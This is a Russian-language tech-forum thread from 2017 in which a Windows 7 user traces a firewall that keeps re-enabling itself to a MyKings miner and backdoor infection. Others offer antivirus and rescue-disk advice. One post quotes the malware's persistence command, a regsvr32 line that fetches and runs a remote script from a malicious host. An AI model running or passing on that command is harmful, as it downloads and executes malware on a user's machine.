![]() |
|
Сайт 3DNews | Регистрация | Правила | Справка | Пользователи | Календарь | Поиск | Сообщения за день | Все разделы прочитаны |
|
![]() ![]() |
Опции темы | Опции просмотра |
![]() |
[включить плавающее окно] #1 | |
![]() Автор темы Регистрация: 28.11.2014
|
Брандмауэр Windows 7 сам включается
|
|
![]() |
![]() |
![]() |
[включить плавающее окно] #2 |
![]() Регистрация: 12.11.2012
|
Извиняюсь, ступил по старой памяти. Спать пора. ![]() Последний раз редактировалось Zagadnik; 16.05.2017 в 22:55. |
![]() |
![]() |
![]() |
[включить плавающее окно] #3 |
|
Понял причину:
В автозагрузке постоянно прописываются js.mykings 280. Т.е. действует какой-то троян. И это еще не самый опасный троян, по сравнению с вредоносным шифровальщиком WannaCry. Тем не менее, постоянно запускающийся Брандмауэр и эти две точки автозагрузки буду искать способ как-то вырубить. А может и переустановка винды. |
![]() |
![]() |
![]() |
[включить плавающее окно] #4 |
![]() Регистрация: 08.02.2003
|
Цитата
(Antonych85) »
Установлен антивирусник Avast
Цитата
(Antonych85) »
действует какой-то троян
![]() |
[включить плавающее окно] #5 |
![]() Регистрация: 12.11.2012
|
Lesnik75
Ещё грустнее от того, что AVG теперь это тот же самый Avast... |
![]() |
![]() |
![]() |
[включить плавающее окно] #6 |
![]() Регистрация: 30.12.2004
|
Цитата
(Lesnik75) »
почему я не удивлен?
![]() Добавлено через 6 минут Цитата
(Zagadnik) »
AVG теперь это тот же самый Avast...
![]() ![]()
![]() |
[включить плавающее окно] #7 |
|
Еще скажу, Avast с 4 по 9 мая отлавливал файлы item.dat и test[1].dat. а в планировщике появилось задание mysa. В автозагрузке - start и start1, ведущие по ссылке на js.mykings.280. отключаю их из автозагрузки но они вновь включаются.
Ни Доктор Веб Курейт, ни Аваст Интернет Секьюрити не обнаруживают хоть какую-то зацепку, при сканировании. AVZ тоже ничего не обнаружил. Последний раз редактировалось Antonych85; 17.05.2017 в 18:06. |
![]() |
![]() |
![]() |
[включить плавающее окно] #8 |
![]() Регистрация: 24.12.2012
|
Цитата
(Antonych85) »
отключаю их из автозагрузки но они вновь включаются.
1. очистишь систему от говён из другой ОС (LiceCD DrWeb или Касперского) 2. не поставишь нормальный антивирь ![]() |
![]() |
![]() |
![]() |
[включить плавающее окно] #9 |
|
Нормальный антивирь это какой еще? И Авиру пробовал - они банят периодически активацию (XP), и Касперский (w98) в середине нулевых стоял - тормозил систему, и Панда (XP), которую вообще посоветовали снести. и самый нормальный по состоянию на 2004 год был др Веб со спайдером (на Windows 98).
|
![]() |
![]() |
![]() |
[включить плавающее окно] #10 |
|
Цитата
(Antonych85) »
Нормальный антивирь это какой еще? И Авиру пробовал - они банят периодически активацию (XP), и Касперский (w98) в середине нулевых стоял - тормозил систему, и Панда (XP), которую вообще посоветовали снести. и самый нормальный по состоянию на 2004 год был др Веб со спайдером (на Windows 98).
Набираем - "топовый антивирус" и радуемся ![]() |
![]() |
![]() |
![]() |
[включить плавающее окно] #11 |
|
Набрал - первый результат это Касперский, затем посмотрел рейтинги, первые места Каспер занимает. Как? С ним у меня 98-я винда грузилась 10 минут на Селероне 2400 с ОЗУ 256 мб. Без него 4 минуты. О_о.
|
![]() |
![]() |
![]() |
[включить плавающее окно] #12 |
![]() Регистрация: 29.06.2004
|
Antonych85
Вам скорость загрузки Винды важна или защищенность от большей части зловредов? Если первое - то сидите без антивируса, это самый быстрый вариант.
![]() |
[включить плавающее окно] #13 |
|
Цитата
(Antonych85) »
Набрал - первый результат это Касперский, затем посмотрел рейтинги, первые места Каспер занимает. Как? С ним у меня 98-я винда грузилась 10 минут на Селероне 2400 с ОЗУ 256 мб. Без него 4 минуты. О_о.
![]() Не хочу разрушать Ваш мирок, но ... сейчас 2017 год!!! В ходу 4х ядерные CPU, 8-16Гб оперативки и очень быстрые SSD. PS: чуть не забыл, сменилось уже 7 поколений Windows!!! ![]() PPS: и linux стал вполне себе user friendly, и его можно без антивируса юзать ![]() Последний раз редактировалось zl0dey4eg; 17.05.2017 в 21:13. |
![]() |
![]() |
![]() |
[включить плавающее окно] #14 |
|
Да не. У меня сейчас 2500К, и 8 гиг оперативки, и Винда 7 64 бита. Конечно сменить не мешало бы, но кризис этот... Железки в цене выросли. Сейчас выяснилось вот что, в планировщике Mysa. item.dat снес, но regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll прописался в автозагрузке в виде трех прог косящих под проги винды, походу всерьез, причем эти майнер и бэкдор, говорят, вновь появляются на свежеустановленной системе, даже формат С не помогает.
Прибивать автозагрузку бесполезно, активируются вновь, а вот снесеный item.dat не появляется больше. Попробую MALWAREBYTES прогнать, антивирусы ничего не находят - молчат, даже др.Веб курейт, который самый нормальный был. Добавлено через 2 минуты Цитата
(garniv) »
Antonych85
Вам скорость загрузки Винды важна или защищенность от большей части зловредов? Если первое - то сидите без антивируса, это самый быстрый вариант. Последний раз редактировалось Antonych85; 19.05.2017 в 01:42. |
![]() |
![]() |
![]() |
[включить плавающее окно] #15 |
![]() Регистрация: 09.04.2010
|
Ваш вопрос схож с моей проблемой.
Только у меня ОС WinXP. Получилось ли у Вас победить данный зловред и каким образом? |
![]() |
![]() |
![]() |
[включить плавающее окно] #16 |
|
Цитата
(ladir) »
Получилось ли у Вас победить данный зловред и каким образом?
1. Kaspersky Rescue Disk (Free) 2. Dr.Web LiveDisk (free) ![]()
![]() |
[включить плавающее окно] #17 |
![]() Регистрация: 09.04.2010
|
Уточните каким образом у Вас проявлялась активность данного вируса.
|
![]() |
![]() |